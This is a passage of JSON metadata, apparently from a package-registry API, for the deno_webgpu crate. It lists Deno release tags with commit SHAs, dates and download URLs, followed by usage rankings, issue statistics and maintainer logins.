2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T14:54:28.910Z","dependent_packages_count":9,"downloads":506166,"downloads_period":"total","dependent_repos_count":34,"rankings":{"downloads":6.3665864754067645,"dependent_repos_count":4.930496198659409,"dependent_packages_count":4.227389948422694,"stargazers_count":1.0762116749481005,"forks_count":1.3699964775801725,"docker_downloads_count":3.2619210090208988,"average":3.53876696400634},"purl":"pkg:cargo/deno_webgpu","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_webgpu","docker_dependents_count":29,"docker_downloads_count":23282367,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_webgpu","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_webgpu/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"h